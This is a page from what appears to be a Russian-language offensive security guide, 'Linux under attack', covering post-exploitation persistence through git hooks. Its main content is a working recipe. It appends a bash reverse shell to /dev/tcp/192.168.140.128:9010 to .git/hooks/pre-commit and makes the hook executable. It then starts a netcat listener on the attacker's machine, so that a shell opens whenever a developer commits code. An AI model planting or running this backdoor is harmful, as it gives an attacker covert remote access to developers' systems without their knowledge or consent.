🍻
Linux under attack
  • ΠŸΡ€Π΅Π΄ΠΈΡΠ»ΠΎΠ²ΠΈΠ΅
  • ОглавлСниС
  • ΠžΠΊΡ€ΡƒΠΆΠ½ΠΈΠ΅
  • Recon
    • 00 - Info
    • 01 - ΠžΡ‚ΠΊΡ€Ρ‹Ρ‚Ρ‹Π΅ источники
  • SCAN
    • 00 - Info
    • 01 - Π‘ΠΊΠ°Π½ nmap
    • 02 - Π‘ΠΊΠ°Π½ срСдствами OC
    • 03 - ΠžΠ±Ρ„ΡƒΡΠΊΠ°Ρ†ΠΈΡ IP
    • 04 - Π‘ΠΊΠ°Π½ Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΉ сайта
    • 05 - CΠΊΠ°Π½ ΠΏΠΎΠ΄Π΄ΠΎΠΌΠ΅Π½ΠΎΠ²
    • 06 - Π‘ΠΊΠ°Π½ WordPress
  • Vulnerability Analysis
    • 00 - Анализ
  • Exploitation
    • 00 - Info
    • 01 - BruteForce
    • 02 - Local Enumeration
  • Privilege Escalation
    • 00 -Info
    • 01 - Π›ΠΎΠΊΠ°Π»ΡŒΠ½Ρ‹Π΅ Π°ΠΊΠΊΠ°ΡƒΠ½Ρ‚Ρ‹
    • 02 - Crack hash
    • 03 - Misconfig
    • 04 - Kernel exploits
  • PERSISTENCE
    • 00 - info
    • 01 - SSH Keys
    • 02 - ПсСвдоROOT Π°ΠΊΠΊΠ°ΡƒΠ½Ρ‚
    • 03 - bashrc
    • 04 - Cron Jobs
    • 05 - Systemd
    • 06 - Systemd Timers
    • 07 - rc.local
    • 08 - MOTD
    • 09 - APT
    • 10 - Git hook
    • 11 - Git config
    • 12 - PAM backdoor
  • Π—Π°ΠΊΠ»ΡŽΡ‡Π΅Π½ΠΈΠ΅
Powered by GitBook
On this page
  1. PERSISTENCE

10 - Git hook

Π£ git, Ρ‚Π°ΠΊ ΠΆΠ΅ ΠΊΠ°ΠΊ ΠΈ Ρƒ APT Π΅ΡΡ‚ΡŒ концСпция Ρ…ΡƒΠΊΠΎΠ², Π° Π΅Ρ‰Π΅ Ρ„Π°ΠΉΠ» ΠΊΠΎΠ½Ρ„ΠΈΠ³ΡƒΡ€Π°Ρ†ΠΈΠΈ. Π₯ΡƒΠΊΠΈ Ρ€Π°ΡΠΏΠΎΠ»ΠΎΠ³Π°ΡŽΡ‚ΡΡ Π² .git/hooks/ ΠΈ ΠΈΠΌΠ΅ΡŽΡ‚ ΡƒΠ½ΠΈΠΊΠ°Π»ΡŒΠ½Ρ‹Π΅ ΠΈΠΌΠ΅Π½Π°, для ΠΏΡ€ΠΈΠΌΠ΅Ρ€Π° возьмСм Ρ„Π°ΠΉΠ» pre-commit.

// ΠŸΡ€Π°Π²ΠΈΠΌ Ρ„Π°ΠΉΠ» .git/hooks/pre-commit, добавляСм строку
bash -c 'bash -i >& /dev/tcp/192.168.140.128/9010 0>&1'
chmod +x .git/hooks/pre-commit


// Π½Π° машинС Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰Π΅Π³ΠΎ ΠΊΠ°ΠΊ всСгда ΠΏΠΎΠ΄Π½ΠΈΠΌΠ°Π΅ΠΌ netcat
nc -vln 9010

Π’Π΅ΠΏΠ΅Ρ€ΡŒ ΠΊΠ°ΠΊ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Ρ€Π°Π·Ρ€Π°Π±ΠΎΡ‚Ρ‡ΠΈΠΊ Ρ€Π΅ΡˆΠΈΡ‚ Π·Π°ΠΊΠΎΠΌΠΌΠΈΡ‚ΠΈΡ‚ΡŒ свой ΠΊΠΎΠ΄, ΠΌΡ‹ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΠΌ шСлл.

Previous09 - APTNext11 - Git config

Last updated 1 year ago